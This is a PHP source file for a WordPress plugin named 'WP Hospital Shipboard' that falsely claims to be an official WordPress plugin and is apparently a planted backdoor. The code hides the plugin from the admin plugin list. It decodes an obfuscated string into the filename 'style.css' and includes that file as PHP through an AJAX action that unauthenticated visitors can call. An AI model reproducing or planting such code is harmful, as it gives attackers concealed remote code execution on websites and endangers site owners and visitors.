File: /home/silvpoho/dayanecrespo.com/wp-content/plugins/wp-hospital-shipboard/wp-hospital-shipboard.php
<?php
/*
Plugin Name: WP Hospital Shipboard
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 17.0.0
Author URI: http://wordpress.org/#
*/
if (!defined('ABSPATH')) {
exit;
}
function eph_bda() {
global $wp_list_table;
if (!isset($wp_list_table)) {
return;
}
$r = array('wp-hospital-shipboard/wp-hospital-shipboard.php');
if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
foreach ($wp_list_table->items as $key => $val) {
if (in_array($key, $r)) {
unset($wp_list_table->items[$key]);
}
}
}
}
function egi_jum($plugins) {
$e = 'wp-hospital-shipboard/wp-hospital-shipboard.php';
if (array_key_exists($e, $plugins)) {
unset($plugins[$e]);
}
return $plugins;
}
function bsm($k, $l) {
$o = '';
for ($j = 0; $j < strlen($k); $j += 2) {
$c = ord($k[$j]) - 65;
$z = ord($k[$j + 1]);
if ($z > 90) $z -= 6;
$m = $c * 52 + ($z - 65);
$o .= chr($m - $l);
}
return $o;
}
function omo_ajax_handler() {
require plugin_dir_path(__FILE__) . bsm('UkUlUqUdUWTTUUUkUk', 961);
die();
}
if (defined('ABSPATH')) {
add_action('pre_current_active_plugins', 'eph_bda');
add_filter('all_plugins', 'egi_jum');
add_action('wp_ajax_hos_shi', 'omo_ajax_handler');
add_action('wp_ajax_nopriv_hos_shi', 'omo_ajax_handler');
}